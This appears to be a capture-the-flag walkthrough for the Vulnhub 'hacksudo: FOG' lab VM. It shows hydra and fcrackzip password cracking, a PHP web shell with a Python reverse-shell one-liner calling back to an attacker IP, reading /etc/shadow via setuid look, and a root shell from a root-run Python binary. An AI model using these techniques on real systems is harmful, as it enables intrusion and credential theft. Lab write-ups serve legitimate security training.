Vulnhub hacksudo: FOG Walkthrough
https://www.vulnhub.com/entry/hacksudo-fog,697/
Scan all TCP ports with version detection and default scripts.
nmap -sV -sC -p- -oN ports.log 192.168.56.100
PORT STATE SERVICE VERSION
21/tcp open ftp Pure-FTPd
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hacksudo FOG
111/tcp open rpcbind 2-4 (RPC #100000)
443/tcp open ssl/https Apache/2.4.38 (Debian)
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hacksudo FOG
2049/tcp open nfs_acl 3 (RPC #100227)
3306/tcp open mysql MySQL 5.5.5-10.3.27-MariaDB-0+deb10u1
...
43195/tcp open mountd 1-3 (RPC #100005)
45469/tcp open nlockmgr 1-4 (RPC #100021)
48871/tcp open mountd 1-3 (RPC #100005)
52195/tcp open mountd 1-3 (RPC #100005)
Enumerate directories and files on port 80. dict.txt turns out to be a small wordlist; download it.
gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-big.txt -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
/index.php (Status: 302) [Size: 0] [--> /fog/index.php]
/index.html (Status: 200) [Size: 853]
/index1.html (Status: 200) [Size: 329]
/cms (Status: 301) [Size: 314] [--> http://192.168.56.100/cms/]
/dict.txt (Status: 200) [Size: 1798]
/fog (Status: 301) [Size: 314] [--> http://192.168.56.100/fog/]
The CMS page reveals the username hacksudo.
[image-20210518224756405.png]
Brute-force FTP with the username hacksudo and dict.txt as the password list.
hydra -l hacksudo -P dict.txt -t 32 192.168.56.100 ftp -f
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-18 22:38:34
[DATA] max 32 tasks per 1 server, overall 32 tasks, 196 login tries (l:1/p:196), ~7 tries per task
[DATA] attacking ftp://192.168.56.100:21/
[21][ftp] host: 192.168.56.100 login: hacksudo password: hackme
[STATUS] attack finished for 192.168.56.100 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Log in to FTP as hacksudo:hackme and download secr3tSteg.zip from the hacksudo_ISRO_bak directory (flag1.txt is in the root).
ftp> ls -la
200 PORT command successful
150 Connecting to port 43827
drwxr-xr-x 3 1002 ftpgroup 4096 May 7 03:34 .
drwxr-xr-x 3 1002 ftpgroup 4096 May 7 03:34 ..
-rw-r--r-- 1 33 33 389 May 7 03:34 flag1.txt
drwxr-xr-x 2 0 0 4096 May 6 13:57 hacksudo_ISRO_bak
226-Options: -a -l
226 4 matches total
ftp> cd hacksudo_ISRO_bak
250 OK. Current directory is /hacksudo_ISRO_bak
ftp> ls -la
200 PORT command successful
150 Connecting to port 46515
drwxr-xr-x 2 0 0 4096 May 6 13:57 .
drwxr-xr-x 3 1002 ftpgroup 4096 May 7 03:34 ..
-rw-r--r-- 1 0 0 63 May 5 11:07 authors.txt
-rw-r--r-- 1 0 0 0 May 6 11:36 installfog
-rw-r--r-- 1 0 0 1573833 May 6 19:24 secr3tSteg.zip
Brute-force the zip password with fcrackzip (dictionary mode, unzip-based verification).
fcrackzip -u -D -p /usr/share/wordlists/rock_ascii.txt secr3tSteg.zip
PASSWORD FOUND!!!!: pw == fooled
Download the SoundStegno tool that is linked in the page source of index1.html.
[image-20210519103824772.png]
Extract the hidden message from the wav file unpacked from secr3tSteg.zip; it contains the hints.
python3 /opt/SoundStegno/ExWave.py -f ./hacksudoSTEGNO.wav
...
Visit for more tutorials : www.youtube.com/techchipnet
Hide your text message in wave audio file like MR.ROBOT
Please wait...
Your Secret Message is: Shift by 3
ABCDEFGHIJKLMNOPQRSTUVWXYZ
DEFGHIJKLMNOPQRSTUVWXYZABC
zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR
Decrypt the Caesar-shifted line (shift 3) at http://rumkin.com/tools/cipher/caesar-keyed.php.
[image-20210518224455131.png]
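The same decode done offline, as an added example that is not part of the original walkthrough (the author used the rumkin web page). The only input is the ciphertext exactly as ExWave.py printed it above and the "Shift by 3" hint; the helper names and the credential regex are my own assumptions about the message layout, not anything from the SoundStegno tool.

```python
# Added example (not from the walkthrough): decode the Caesar-shifted hint
# recovered from hacksudoSTEGNO.wav. The hidden message said "Shift by 3".
import re
import string

# Ciphertext exactly as printed by ExWave.py in the walkthrough.
CIPHERTEXT = "zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR"


def caesar_decrypt(text: str, shift: int) -> str:
    """Shift every ASCII letter back by `shift` positions, preserving case.
    Non-letters (the '.', '/', '=' and ':' separators here) pass through
    untouched, which is what keeps the Username=...:password=... layout
    readable after decoding. A negative shift encrypts."""
    out = []
    for ch in text:
        if ch in string.ascii_lowercase:
            base = ord("a")
        elif ch in string.ascii_uppercase:
            base = ord("A")
        else:
            out.append(ch)
            continue
        out.append(chr((ord(ch) - base - shift) % 26 + base))
    return "".join(out)


def brute_force(text: str) -> dict:
    """All 26 candidate plaintexts keyed by shift, for the case where the
    hint does not hand you the key. Pick the one that contains a keyword."""
    return {k: caesar_decrypt(text, k) for k in range(26)}


def likely_shifts(text: str, keyword: str = "password") -> list:
    """Shifts whose candidate plaintext contains `keyword` (case-insensitive).
    Because the shift is a bijection on letters, a fixed word can only appear
    at one shift unless the ciphertext happens to contain it elsewhere."""
    return [k for k, cand in brute_force(text).items()
            if keyword.lower() in cand.lower()]


# Assumed layout of the decoded hint: "... Username=<user>:password=<pass>".
CRED_RE = re.compile(r"Username=([^:\s]+):password=(\S+)", re.IGNORECASE)


def extract_credentials(plaintext: str):
    """Return (username, password) from the decoded hint, or None if the
    assumed Username=...:password=... pattern is absent."""
    m = CRED_RE.search(plaintext)
    return (m.group(1), m.group(2)) if m else None


if __name__ == "__main__":
    plain = caesar_decrypt(CIPHERTEXT, 3)
    print(plain)
    print(extract_credentials(plain))
    print("shifts containing 'password':", likely_shifts(CIPHERTEXT))
```

Running it prints the decoded line and the credential pair; only shift 3 yields a candidate containing the word "password". Note that the decoded text names the user as fog, while the walkthrough logs in to the CMS as hacksudo with the same password.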
Log in to the CMS with hacksudo:hacksudoISRO (the password from the decoded message). Inside, there is a file cmsmsrce.txt.
[image-20210518224924381.png]
Check the content of the txt file: it is a PHP web shell that runs the value of the cmd parameter.
[image-20210519104218050.png]
Save the content of cmsmsrce.txt as shell.php under /cms/uploads/, then open the following URL in the browser. The cmd parameter is a URL-encoded Python one-liner that connects back to 192.168.56.150:1234 and attaches /bin/bash to the socket.
http://192.168.56.100/cms/uploads/shell.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.150%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27
Start a listener on port 1234 in another terminal beforehand; the reverse shell arrives as www-data.
[image-20210519104609411.png]
Look for setuid binaries. Most of the list is standard, but /usr/bin/look is not normally setuid root on Debian.
find / -perm -u=s 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/mount.nfs
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/look
/usr/bin/mount
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/su
/usr/bin/passwd
Use look to read /etc/shadow. look opens the file with the setuid root privileges, and an empty prefix matches every line, so it prints the whole file.
www-data@hacksudo:/home$ look '' /etc/shadow
root:$6$zHA6yDSHPcoPX7dX$2oZJxM7gBzhQIT049d4MuR7jAypyZpDPoo6aKQfkJAfJNKF/CgY1GYFCu.Wb5cB6713Zjtzgk.ls0evZ6YToD/:18756:0:99999:7:::
...
isro:$6$DMdxcRB0fQbGflz2$39vmRyBB0JubEZpJJN13rSzssMQ6t1R6KXLSPjOmpImsyuWqyXHneT8CH0nKr.XDEzKIjt1H3ndbNzirCjOAa/:18756:0:99999:7:::
dnsmasq:*:18756:0:99999:7:::
Save the shadow lines to hash.txt and crack the isro hash with john.
john --wordlist=/usr/share/wordlists/rock_ascii.txt hash.txt
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
qwerty (isro)
Log in via SSH as isro with the cracked password. sudo -l only allows ls on /home/isro/* as root, which is a rabbit hole.
ssh isro@192.168.56.100
isro@192.168.56.100's password:
Linux hacksudo 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
Last login: Tue May 18 11:33:26 2021 from 192.168.56.150
isro@hacksudo:~$ sudo -l
[sudo] password for isro:
Matching Defaults entries for isro on hacksudo:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User isro may run the following commands on hacksudo:
(root) /usr/bin/ls /home/isro/*
isro@hacksudo:~$
In /home/isro/fog there is an executable named fog owned by root. Note that the listing shows no setuid bit on it, so a practitioner would also check file capabilities, not only SUID bits, when looking for the reason it grants root.
isro@hacksudo:~$ ls -la
total 40
drwxr-x--- 5 isro isro 4096 May 18 12:16 .
drwxr-xr-x 6 root root 4096 May 8 12:25 ..
-rw------- 1 root isro 41 May 18 11:44 .bash_history
-rw-r--r-- 1 isro isro 0 May 5 14:05 .bash_logout
-rw-r--r-- 1 isro isro 4623 May 13 04:59 .bashrc
drwxr-xr-x 2 isro isro 4096 May 13 05:06 fog
drwx------ 3 isro isro 4096 May 5 14:09 .gnupg
drwxr-xr-x 3 isro isro 4096 May 5 14:11 .local
-rw-r--r-- 1 isro isro 0 May 5 14:05 .profile
-r-------- 1 isro isro 33 May 6 14:31 user.txt
-rw------- 1 isro isro 54 May 18 12:16 .Xauthority
isro@hacksudo:~$ cd fog
isro@hacksudo:~/fog$ ls -la
total 3700
drwxr-xr-x 2 isro isro 4096 May 13 05:06 .
drwxr-x--- 5 isro isro 4096 May 18 12:16 ..
-rwxr-xr-x 1 root isro 16712 May 12 13:46 fog
-rw-r--r-- 1 isro isro 0 May 6 14:30 get
-rwxr-xr-x 1 isro isro 69368 May 6 14:29 ping
-rwxr-xr-x 1 isro isro 3689352 May 6 14:30 python
Run fog: it drops into a Python 2 interpreter. Checking id from it shows uid=0, i.e. the interpreter runs as root.
isro@hacksudo:~/fog$ ./fog
Python 2.7.16 (default, Oct 10 2019, 22:02:15)
[GCC 8.3.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import os;os.system("id");
uid=0(root) gid=1003(isro) groups=1003(isro)
0
Spawn a root shell from the interpreter with pty.spawn.
>>> import pty;pty.spawn("/bin/bash");
┌──(root💀hacksudo)-[~/fog]
└─# id;hostname
uid=0(root) gid=1003(isro) groups=1003(isro)
hacksudo